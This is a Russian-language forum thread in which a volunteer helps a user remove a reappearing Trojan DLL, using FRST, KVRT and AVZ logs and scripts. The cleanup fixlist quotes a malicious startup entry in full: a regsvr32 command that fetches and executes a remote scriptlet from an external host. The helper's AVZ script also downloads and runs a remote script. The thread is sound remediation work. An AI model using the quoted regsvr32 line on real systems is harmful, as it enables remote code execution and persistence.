[РЕШЕНО] Как удалить HEUR:Trojan.Win32.Inject.gen

[drupa7]

Добрый день. На компьютере обнаружен Ms553510C4App.dll в папке system32, который антивирус Kaspersky Endpoint Security 11 детектирует как HEUR:Trojan.Win32.Inject.gen и удаляет, но через некоторое время файл появляется снова.

 

В журнале событий в разделе "Безопасность" с высокой скоростью появляются события от источника "Microsoft Windows security auditing." с кодами события 5156 и 5158:

 

*****************************************************************

Платформа фильтрации Windows разрешила подключение.

 

Сведения о приложении:

Идентификатор процесса: 12152

Имя приложения: \device\harddiskvolume2\windows\syswow64\svchost.exe

 

Сведения о сети:

Направление: Исходящие

Адрес источника: 192.168.1.238

Порт источника: 56006

Адрес назначения: 45.228.68.190

Порт назначения: 445

Протокол: 6

 

Сведения о фильтре:

Код выполнения фильтра: 66943

Имя уровня: Подключить

Код выполнения уровня: 48 

********************************************************************

 

Платформа фильтрации IP-пакетов Windows разрешила привязку к локальному порту.

 

Сведения о приложении:

Идентификатор процесса: 12152

Имя приложения: \device\harddiskvolume2\windows\syswow64\svchost.exe

 

Сведения о сети:

Адрес источника: 0.0.0.0

Порт источника: 53409

Протокол: 6

 

Сведения о фильтре:

Идентификатор выполнения фильтра: 0

Имя уровня: Назначение ресурсов

Идентификатор выполнения уровня: 36

******************************************************************

 

Таких событий настолько много, что файл журнала 20 мегабайт перезаписывается полностью за несколько минут, я заметил, что постоянно меняется "Порт источника" последовательно примерно с 49000 до 65400 и так по кругу

 

Прикрепляю логи.

CollectionLog-2019.09.19-13.03.zip

[Sandor]

Здравствуйте!

 

Вы собрали логи устаревшей версией. Удалите Autologger и созданную им папку вместе с содержимым. Скачайте актуальную версию (по ссылке из правил) и повторите CollectionLog.

 

Параллельно обратитесь в тех-поддержку антивируса.

[drupa7]

Извините, я в первый раз на этом форуме. Я скачал по указанной Вами ссылке и по ссылке из правил. Оба Автологера запускаются с сообщением "Пожалуйста, скачайте свежую версию Автосборщика логов". Оба имеют дату создания 20.09.2019 , время изменения 02.30. А при запуске в окне написано "Дата последнего обновления 2019.08.10".

Скажите, пожалуйста, мне нужно скачать именно "AutoLogger-test" или "AutoLogger" с другого ресурса?

[Sandor]

Ясно, отбой.

Сделайте это:

Скачайте Farbar Recovery Scan Tool (или с зеркала) и сохраните на Рабочем столе.

 

Примечание: необходимо выбрать версию, совместимую с вашей операционной системой. Если вы не уверены, какая версия подойдет для вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на вашей системе.

Когда программа запустится, нажмите Yes для соглашения с предупреждением.

 

Нажмите кнопку Scan.

После окончания сканирования будут созданы отчеты FRST.txt и Addition.txt в той же папке, откуда была запущена программа. Прикрепите отчеты к своему следующему сообщению.

Подробнее читайте в этом руководстве.

[drupa7]

Выполнил Scan в FarBar

Addition.txt

FRST.txt

[Sandor]

• Отключите до перезагрузки антивирус.
• Выделите следующий код:

  Start::
  HKU\S-1-5-21-1897075452-930940914-2298633373-1007\...\MountPoints2: {3cf2e44d-4fde-11e0-ac98-806e6f6e6963} - F:\Windows\Setup.exe
  HKU\S-1-5-21-1897075452-930940914-2298633373-1034\...\MountPoints2: {39598c69-baa9-11e9-9c3e-902b3413d50f} - F:\Run.exe
  HKU\S-1-5-21-1897075452-930940914-2298633373-500\...\MountPoints2: {39598c69-baa9-11e9-9c3e-902b3413d50f} - F:\Run.exe
  HKLM\Software\...\AppCompatFlags\Custom\acrord32.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> Exploit Blocker Database for x86
  HKLM\Software\...\AppCompatFlags\Custom\acrord32.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> Exploit Blocker Database for x64
  HKLM\Software\...\AppCompatFlags\Custom\brosec.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> Exploit Blocker Database for x86
  HKLM\Software\...\AppCompatFlags\Custom\brosec.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> Exploit Blocker Database for x64
  HKLM\Software\...\AppCompatFlags\Custom\browser.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> Exploit Blocker Database for x86
  HKLM\Software\...\AppCompatFlags\Custom\browser.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> Exploit Blocker Database for x64
  HKLM\Software\...\AppCompatFlags\Custom\chrome.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> Exploit Blocker Database for x86
  HKLM\Software\...\AppCompatFlags\Custom\chrome.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> Exploit Blocker Database for x64
  HKLM\Software\...\AppCompatFlags\Custom\cscript.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> Exploit Blocker Database for x86
  HKLM\Software\...\AppCompatFlags\Custom\cscript.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> Exploit Blocker Database for x64
  HKLM\Software\...\AppCompatFlags\Custom\excel.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> Exploit Blocker Database for x86
  HKLM\Software\...\AppCompatFlags\Custom\excel.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> Exploit Blocker Database for x64
  HKLM\Software\...\AppCompatFlags\Custom\firefox.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> Exploit Blocker Database for x86
  HKLM\Software\...\AppCompatFlags\Custom\firefox.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> Exploit Blocker Database for x64
  HKLM\Software\...\AppCompatFlags\Custom\foxitreader.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> Exploit Blocker Database for x86
  HKLM\Software\...\AppCompatFlags\Custom\foxitreader.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> Exploit Blocker Database for x64
  HKLM\Software\...\AppCompatFlags\Custom\iexplore.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> Exploit Blocker Database for x86
  HKLM\Software\...\AppCompatFlags\Custom\iexplore.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> Exploit Blocker Database for x64
  HKLM\Software\...\AppCompatFlags\Custom\infopath.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> Exploit Blocker Database for x86
  HKLM\Software\...\AppCompatFlags\Custom\infopath.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> Exploit Blocker Database for x64
  HKLM\Software\...\AppCompatFlags\Custom\java-rmi.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> Exploit Blocker Database for x86
  HKLM\Software\...\AppCompatFlags\Custom\java-rmi.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> Exploit Blocker Database for x64
  HKLM\Software\...\AppCompatFlags\Custom\java.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> Exploit Blocker Database for x86
  HKLM\Software\...\AppCompatFlags\Custom\java.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> Exploit Blocker Database for x64
  HKLM\Software\...\AppCompatFlags\Custom\javacpl.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> Exploit Blocker Database for x86
  HKLM\Software\...\AppCompatFlags\Custom\javacpl.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> Exploit Blocker Database for x64
  HKLM\Software\...\AppCompatFlags\Custom\javaw.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> Exploit Blocker Database for x86
  HKLM\Software\...\AppCompatFlags\Custom\javaw.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> Exploit Blocker Database for x64
  HKLM\Software\...\AppCompatFlags\Custom\javaws.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> Exploit Blocker Database for x86
  HKLM\Software\...\AppCompatFlags\Custom\javaws.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> Exploit Blocker Database for x64
  HKLM\Software\...\AppCompatFlags\Custom\jjs.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> Exploit Blocker Database for x86
  HKLM\Software\...\AppCompatFlags\Custom\jjs.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> Exploit Blocker Database for x64
  HKLM\Software\...\AppCompatFlags\Custom\jp2launcher.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> Exploit Blocker Database for x86
  HKLM\Software\...\AppCompatFlags\Custom\jp2launcher.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> Exploit Blocker Database for x64
  HKLM\Software\...\AppCompatFlags\Custom\jusched.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> Exploit Blocker Database for x86
  HKLM\Software\...\AppCompatFlags\Custom\jusched.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> Exploit Blocker Database for x64
  HKLM\Software\...\AppCompatFlags\Custom\lync.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> Exploit Blocker Database for x86
  HKLM\Software\...\AppCompatFlags\Custom\lync.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> Exploit Blocker Database for x64
  HKLM\Software\...\AppCompatFlags\Custom\msaccess.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> Exploit Blocker Database for x86
  HKLM\Software\...\AppCompatFlags\Custom\msaccess.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> Exploit Blocker Database for x64
  HKLM\Software\...\AppCompatFlags\Custom\mshta.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> Exploit Blocker Database for x86
  HKLM\Software\...\AppCompatFlags\Custom\mshta.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> Exploit Blocker Database for x64
  HKLM\Software\...\AppCompatFlags\Custom\mspub.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> Exploit Blocker Database for x86
  HKLM\Software\...\AppCompatFlags\Custom\mspub.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> Exploit Blocker Database for x64
  HKLM\Software\...\AppCompatFlags\Custom\onenoteim.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> Exploit Blocker Database for x86
  HKLM\Software\...\AppCompatFlags\Custom\onenoteim.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> Exploit Blocker Database for x64
  HKLM\Software\...\AppCompatFlags\Custom\onenotem.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> Exploit Blocker Database for x86
  HKLM\Software\...\AppCompatFlags\Custom\onenotem.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> Exploit Blocker Database for x64
  HKLM\Software\...\AppCompatFlags\Custom\opera.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> Exploit Blocker Database for x86
  HKLM\Software\...\AppCompatFlags\Custom\opera.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> Exploit Blocker Database for x64
  HKLM\Software\...\AppCompatFlags\Custom\outlook.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> Exploit Blocker Database for x86
  HKLM\Software\...\AppCompatFlags\Custom\outlook.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> Exploit Blocker Database for x64
  HKLM\Software\...\AppCompatFlags\Custom\plugin-container.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> Exploit Blocker Database for x86
  HKLM\Software\...\AppCompatFlags\Custom\plugin-container.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> Exploit Blocker Database for x64
  HKLM\Software\...\AppCompatFlags\Custom\powerpnt.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> Exploit Blocker Database for x86
  HKLM\Software\...\AppCompatFlags\Custom\powerpnt.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> Exploit Blocker Database for x64
  HKLM\Software\...\AppCompatFlags\Custom\powershell.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> Exploit Blocker Database for x86
  HKLM\Software\...\AppCompatFlags\Custom\powershell.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> Exploit Blocker Database for x64
  HKLM\Software\...\AppCompatFlags\Custom\RdrCEF.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> Exploit Blocker Database for x86
  HKLM\Software\...\AppCompatFlags\Custom\RdrCEF.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> Exploit Blocker Database for x64
  HKLM\Software\...\AppCompatFlags\Custom\skype.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> Exploit Blocker Database for x86
  HKLM\Software\...\AppCompatFlags\Custom\skype.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> Exploit Blocker Database for x64
  HKLM\Software\...\AppCompatFlags\Custom\skypepm.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> Exploit Blocker Database for x86
  HKLM\Software\...\AppCompatFlags\Custom\skypepm.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> Exploit Blocker Database for x64
  HKLM\Software\...\AppCompatFlags\Custom\sway.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> Exploit Blocker Database for x86
  HKLM\Software\...\AppCompatFlags\Custom\sway.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> Exploit Blocker Database for x64
  HKLM\Software\...\AppCompatFlags\Custom\winword.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> Exploit Blocker Database for x86
  HKLM\Software\...\AppCompatFlags\Custom\winword.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> Exploit Blocker Database for x64
  HKLM\Software\...\AppCompatFlags\Custom\wscript.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> Exploit Blocker Database for x86
  HKLM\Software\...\AppCompatFlags\Custom\wscript.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> Exploit Blocker Database for x64
  File: C:\Program Files\Common Files\xpdown.dat
  File: C:\Program Files\Common Files\xpwpd.dat
  AlternateDataStreams: C:\ProgramData\TEMP:4FC01C57 [128]
  MSCONFIG\startupreg: start => regsvr32 /u /s /i:http://js.0603bye.info:280/v.sct scrobj.dll
  End::

• Скопируйте выделенный текст (правой кнопкой - Копировать).
• Запустите FRST (FRST64) от имени администратора.
• Нажмите Fix один раз (!) и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.

Компьютер перезагрузите вручную.

 

Подробнее читайте в этом руководстве.

[drupa7]

Я не сразу увидел ссылку на руководство и поэтому запустил в первый раз FRST без файла fixlist.txt, а затем выполнил по инструкции. Поэтому на всякий случай прикладываю два лога. 

Fixlog без fixlisr.txt

Fixlog.txt

[Sandor]

Второй фикс был лишний.

Что сейчас с проблемой?

Дополнительно сделайте проверку KVRT и покажите отчёт.

[drupa7]

Запустил проверку KVRT, были найдены несколько вирусов, в том числе указанный в первом сообщении "Ms553510C4App.dll". Была выполнена процедура лечения с перезагрузкой. В настоящее время снова запустил проверку KVRT, чтобы понять удалился вирус или нет. Не пойму где взять лог KVRT ?

То есть сам лог я вижу в интерфейсе программы, но как его скопировать не пойму

[Sandor]

как его скопировать не пойму

В первом посте ссылки:

зайдите в папку C:\KVRT_Data\ (C:\ это обычно раздел, где установлена работающая версия Windows) и упакуйте папку Reports в архив и прикрепите к теме

[drupa7]

Не нашел как правильно упаковать репорт KVRT, надеюсь все сделал как нужно.

Reports.zip

[Sandor]

снова запустил проверку KVRT

После повторной проверки чисто?

[drupa7]

Да, чисто. KVRT не находит ни одного вируса, 

Kaspersky security 10.1.2 для windows server после проверки пишет только это:

****************************************************************

Объект не проверен. Причина: объект не найден.

Имя объекта: C:\Windows\system32\MSVCR120.dll 

****************************************************************

 

Нужно немного времени на анализ, т.к. события в просмотре событий все равно падают больше чем обычно... но с другими кодами событий. По всей видимости, это уже не имеет отношения к вирусам, по крайней мере к заявленному мной в теме точно.

Должен сказать вам БОЛЬШОЕ СПАСИБО за помощь, очень оперативно и понятно.

[Sandor]

Пока наблюдаете, проверьте уязвимые места:

Выполните скрипт в AVZ при наличии доступа в интернет:

 

var
LogPath : string;
ScriptPath : string;
begin
 LogPath := GetAVZDirectory + 'log\avz_log.txt';
 if FileExists(LogPath) Then DeleteFile(LogPath);
 ScriptPath := GetAVZDirectory +'ScanVuln.txt';
  if DownloadFile('http://dataforce.ru/~kad/ScanVuln.txt', ScriptPath, 1) then ExecuteScript(ScriptPath) else
begin
    if DownloadFile('http://dataforce.ru/~kad/ScanVuln.txt', ScriptPath, 0) then ExecuteScript(ScriptPath)
else begin
       ShowMessage('Невозможно загрузить скрипт AVZ для обнаружения наиболее часто используемых уязвимостей!');
       exit;
      end;
  end;
 if FileExists(LogPath) Then ExecuteFile('notepad.exe', LogPath, 1, 0, false)
end.

После его работы, если будут найдены уязвимости, в блокноте откроется файл avz_log.txt со ссылками на обновления системы и критичных к безопасности программ, которые нужно загрузить и установить.

В первую очередь это относится к браузерам, Java, Adobe Acrobat/Reader и Adobe Flash Player.

 

Пройдитесь по ссылкам из файла avz_log.txt и установите все рекомендуемые обновления (если таковые будут).

Перезагрузите компьютер.

Снова выполните этот скрипт и убедитесь, что уязвимости устранены.

[drupa7]

Скажите, я правильно понял, что если у нас тот же самый вирус был на другой машине, то присланный вами первый скрипт (для FRST) подойдет и для него? Второй компьютер не важный, его можно и переустановить в случае неудачи, поэтому его изначально не рассматривал....